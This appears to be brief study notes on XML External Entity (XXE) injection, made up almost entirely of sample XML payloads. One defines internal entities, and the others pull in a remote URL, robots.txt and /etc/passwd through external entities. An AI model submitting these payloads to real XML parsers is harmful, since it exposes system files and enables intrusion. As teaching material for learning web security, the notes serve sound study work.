XML External Entity (XEE)
XML External Entity -> XEE -> XXE
<?xml version="1.0"?>
<!DOCTYPE change-log[
<!ENTITY myName "Michal">
<!ENTITY mySurname "Szalkowski">
]>
<change-log>
<text>&myName; &mySurname;</text>
</change-log>
webContent
<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY webContent SYSTEM "http://log.michalszalkowski.com/lorem.txt">]>
<root>
<text>&webContent;</text>;
</root>
<?xml version="1.0"?>
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM "robots.txt">]>
<change-log>
<text>&systemEntity;</text>;
</change-log>
fileContent
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY fileContent SYSTEM "/etc/passwd">]>
<root>&fileContent;</root>